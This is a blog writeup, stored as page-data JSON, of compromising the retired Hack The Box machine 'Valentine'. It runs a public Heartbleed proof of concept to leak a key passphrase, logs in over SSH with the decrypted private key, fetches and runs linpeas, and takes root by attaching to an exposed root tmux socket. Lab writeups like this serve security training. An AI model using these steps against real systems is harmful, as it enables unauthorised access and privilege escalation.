{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-valentine-2-en","result":{"data":{"markdownRemark":{"id":"ebcfc03c-5197-59bd-a35b-d832eb0e77df","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-valentine-2\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/88151772139cd63ae78594bae5f16f0a/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXUlEQVQY0zWPTW8SURSG51+476ZubFpGKnDvHWaYgTKUghQcvsJXoNAYsW2mNSlYFNtdV+3CuDIuTdy68Cf4q+7jRePiyUlO8j7nPdbHRcz11Vv9YXFG1GpSOm5SrjepRl3qnT6d4YRSLUL6RbziES+yAV5YQfghKl9CBiFJlcMWrjZg/fh2o39+v+f3r6+sVzHj1+fE10tm8wvm8TuW61v6JzO8o2MavZE5GFFv95hMT2j1R/TGU1JufiPkufS1tfpU4eFxob98vuVudUklGtIdneIeVAxV2oNTRLZIstolEdTYc8uoIEc8kEg3Sz5w2E172Bmld1M2VrW5pcdvQt4vB4xHDfyGoNz2KDQkYTvDYVfhvxSIgkPhVRpVckw4x77yTCPPvGuaCZ+9jE0QPdHWs8S2WTzVjrtPUioyefmPQCEONkgjU6RyDqpoprcRmkbiP+5fcSKt9E7S5g9+IMC+w0a9lwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/88151772139cd63ae78594bae5f16f0a/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/88151772139cd63ae78594bae5f16f0a/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/88151772139cd63ae78594bae5f16f0a/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the retired HackTheBox machine “Valentine.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I start with a fast scan as usual.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.79  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token number\">22</span>/tcp  <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>      OpenSSH <span class=\"token number\">5</span>.9p1 Debian 5ubuntu1.10 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">1024</span> <span class=\"token number\">96</span>:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e <span class=\"token punctuation\">(</span>DSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">46</span>:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp  <span class=\"token function\">open</span>  http     Apache httpd <span class=\"token number\">2.2</span>.22 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.2.22 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Site doesn<span class=\"token string\">'t have a title (text/html).\n443/tcp open  ssl/http Apache httpd 2.2.22\n|_ssl-date: 2022-07-28T12:23:13+00:00; 0s from scanner time.\n|_http-title: Site doesn'</span>t have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.2.22 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssl-cert: Subject: <span class=\"token assign-left variable\">commonName</span><span class=\"token operator\">=</span>valentine.htb/organizationName<span class=\"token operator\">=</span>valentine.htb/stateOrProvinceName<span class=\"token operator\">=</span>FL/countryName<span class=\"token operator\">=</span>US\n<span class=\"token operator\">|</span> Not valid before: <span class=\"token number\">2018</span>-02-06T00:45:25\n<span class=\"token operator\">|</span>_Not valid after:  <span class=\"token number\">2019</span>-02-06T00:45:25\nService Info: Host: <span class=\"token number\">10.10</span>.10.136<span class=\"token punctuation\">;</span> OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Port 443 is open. Accessing it shows a strange image.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a28a6b4dd2ef742921f003bb130f15b4/ee515/image-20220728212353286.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 58.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAADVElEQVQozz2S+0/bZRTGv7+pf8FEcJQECyJOIMhmINmyS9SIRpYsxmm2jBkxbjFd1Lm5giOrMsYQ6HByX7mVUaQTChRYy0ZbxiWlLayUW8PNlnJR0vGDJJPx8aUmvsmTk/O+5z3nOc85kly+j6TkVBKT03g1PpmUtw4RG59EZHQcMnk8L0XFEi6TEyYQHpdAuPx1wl+JJyIuMeRHCH+viIl9LYGYuGSkK8oc+i02bAK/3C7j7JnPOXLobY4deZecy9m0a+9SVHwLU0cXdUffo0IUrth/kBoRU3ssnZrjH1NaWERJrkrYYiSV4gIP7mgIDg2jOK/gQGIK1eWV1Iq7zE9O017fwLjHwx+Xsul4MZKBgkIms87hFMn6w6Jo/eIcuouXqCu4SZFKhXQzPx9Do5aSvHxkIqDwRiHBJ0GBJ1T+Wo6ho5M/fT76Yt7A/OVX/OX1Ym9oRK8upVF01/JDLrbD7zDVb+F24c9It9Rqdrb/wdTTS1SYjCrBbmlpibW1NbqNRqanpxl3ODHG7ONR1nm6mptpuKaip6qaufFx/l5fh6dPQzDX3EFS5uZi6OxCXVQi2t2Poc3A7mkW2t3T32PQNoBnbo5HpzLpiIjGKfyAKOL5KR+fawxXYxOD4r9ZU4dH8S2SRtD2O518kJ6BbE8kFWXleCY85GZfpe33tv8YPn6M9bKS3qQDjKQdxarKQ3/1Gk1aLc3fK9FoNOhSUrFlfIRU+lkWD4UmOr2eF6Tn0N3V4V/2o/+tlcXFRcZcLobsdhwPHjLW3Y3lzTSM0vMMf3oGr2C7PutlSlNP3145mrzrSMVlZUwJoT3uCQquF1BdWcXGxsb/OjpHHVh6enDbRxl1ODClH6fz/Qy698gYiE1gVqyLVQzMLVasVjCWtEJIl2h5c3OTYDAYsqsrKwKrLCwsEFheZrD3Ppa+PjzCn/nxBv0nTmL98ATtJ0/R/nI0xsgYWk5nkndFiZR98TtMopXdMzM9E0q6uLDI0OAQE243KyL5fZOJtUAAk9lMXYka84VvsKYdZrZei1dM2qz4mqbUg2Tn5CDZR0ZYFZWf7eywvb3N1tYWfp9fDGZCWF+o0ML8PAG/n2fi3TM5iUss+m6yjX5r6H1zbp75llZGh4f5F4yappnrWbLXAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a28a6b4dd2ef742921f003bb130f15b4/8ac56/image-20220728212353286.webp 240w,\n/static/a28a6b4dd2ef742921f003bb130f15b4/d3be9/image-20220728212353286.webp 480w,\n/static/a28a6b4dd2ef742921f003bb130f15b4/e46b2/image-20220728212353286.webp 960w,\n/static/a28a6b4dd2ef742921f003bb130f15b4/a5e36/image-20220728212353286.webp 1269w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a28a6b4dd2ef742921f003bb130f15b4/8ff5a/image-20220728212353286.png 240w,\n/static/a28a6b4dd2ef742921f003bb130f15b4/e85cb/image-20220728212353286.png 480w,\n/static/a28a6b4dd2ef742921f003bb130f15b4/d9199/image-20220728212353286.png 960w,\n/static/a28a6b4dd2ef742921f003bb130f15b4/ee515/image-20220728212353286.png 1269w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a28a6b4dd2ef742921f003bb130f15b4/d9199/image-20220728212353286.png\"\n            alt=\"image-20220728212353286\"\n            title=\"image-20220728212353286\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It appears to be related to Heartbleed.</p>\n<p>I ran the exploit code from <a href=\"https://github.com/mpgn/heartbleed-PoC\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - mpgn/heartbleed-PoC: Heartbleed exploit to retrieve sensitive information CVE-2014-0160</a> and was able to retrieve the string “heartbleedbelievethehype” from memory, but wasn’t sure what to do with it at that point.</p>\n<p>I ran gobuster to continue enumeration and found the path <code class=\"language-text\">/dev</code>, which contained a note and a private key.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ gobuster <span class=\"token function\">dir</span> -u http://<span class=\"token variable\">$RHOST</span>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t <span class=\"token number\">40</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> gobuster.txt</code></pre></div>\n<p>However, the private key was in <code class=\"language-text\">Proc-Type: 4,ENCRYPTED</code> format, meaning it was protected by a passphrase.</p>\n<p>I was able to decrypt the private key using the string retrieved earlier.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">openssl rsa -in enc.key -out dec.key</code></pre></div>\n<p>Since I didn’t know the username, I tried root first and got a <code class=\"language-text\">sign_and_send_pubkey: no mutual signature supported</code> error.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">ssh</span> -i dec.ky root@10.10.10.79                                                                   \nsign_and_send_pubkey: no mutual signature supported</code></pre></div>\n<p>This error appears to be caused by an older version of SSH not being supported by a newer SSH client.</p>\n<p>From this point on, I used a Docker container with an older SSH version.</p>\n<p>Root didn’t work, but since the key filename was <code class=\"language-text\">hype_key</code>, I tried the username <code class=\"language-text\">hype</code> and was able to log in with user privileges.</p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>I started enumeration with linpeas.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">curl</span> <span class=\"token number\">10.10</span>.14.2:5000/linpeas.sh -o linpeas.sh\n$ ./linpeas.sh <span class=\"token function\">tee</span> linpeas.txt</code></pre></div>\n<p>Looking at the results:</p>\n<p>The kernel version is old, so there appear to be several exploitable vulnerabilities.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#</span>\n Executing Linux Exploit Suggester <span class=\"token number\">2</span>\n https://github.com/jondonas/linux-exploit-suggester-2\n  <span class=\"token comment\">#############################</span>\n    Linux Exploit Suggester <span class=\"token number\">2</span>\n  <span class=\"token comment\">#############################</span>\n  Local Kernel: <span class=\"token number\">3.2</span>.0\n  Searching <span class=\"token number\">72</span> exploits<span class=\"token punctuation\">..</span>.\n  Possible Exploits\n  <span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span> dirty_cow\n      CVE-2016-5195\n      Source: http://www.exploit-db.com/exploits/40616\n  <span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token punctuation\">]</span> exploit_x\n      CVE-2018-14665\n      Source: http://www.exploit-db.com/exploits/45697\n  <span class=\"token punctuation\">[</span><span class=\"token number\">3</span><span class=\"token punctuation\">]</span> msr\n      CVE-2013-0268\n      Source: http://www.exploit-db.com/exploits/27297\n  <span class=\"token punctuation\">[</span><span class=\"token number\">4</span><span class=\"token punctuation\">]</span> perf_swevent\n      CVE-2013-2094\n      Source: http://www.exploit-db.com/exploits/26131</code></pre></div>\n<p>The sudo version also appears to be quite old.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#</span>\n Sudo version\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#sudo-version                           </span>\nSudo version <span class=\"token number\">1.8</span>.3p1 </code></pre></div>\n<p>I tried a few of the suggested exploits but couldn’t get root.</p>\n<p>Looking at the shell history, I noticed that work had been done in a tmux session with root privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">hype@Valentine:~$ <span class=\"token function\">history</span>\n    <span class=\"token number\">5</span>  <span class=\"token builtin class-name\">cd</span> /\n    <span class=\"token number\">6</span>  <span class=\"token function\">ls</span> -la\n    <span class=\"token number\">7</span>  <span class=\"token builtin class-name\">cd</span> .devs\n    <span class=\"token number\">8</span>  <span class=\"token function\">ls</span> -la\n    <span class=\"token number\">9</span>  tmux -L dev_sess\n   <span class=\"token number\">10</span>  tmux a -t dev_sess\n   <span class=\"token number\">11</span>  tmux --help\n   <span class=\"token number\">12</span>  tmux -S /.devs/dev_sess\n   <span class=\"token number\">13</span>  <span class=\"token builtin class-name\">exit</span></code></pre></div>\n<p>tmux is terminal multiplexing software that allows multiple terminals within a single SSH session.</p>\n<p>This means work can continue from another terminal even after the shell is disconnected.</p>\n<p>From the history, I could see that a socket had been created in <code class=\"language-text\">/.devs/dev_sess</code> inside the machine using the <code class=\"language-text\">-L</code> option.</p>\n<p>Therefore, I was able to obtain root by connecting to the root-privileged shell using the following command:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ tmux -S /.devs/dev_sess </code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>The DirtyCow exploit didn’t work as expected — I’d like to properly read through it someday.</p>","fields":{"slug":"/hackthebox-linux-valentine-2-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-28","description":"A writeup of the retired HackTheBox machine 'Valentine'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Valentine (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-valentine-2-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}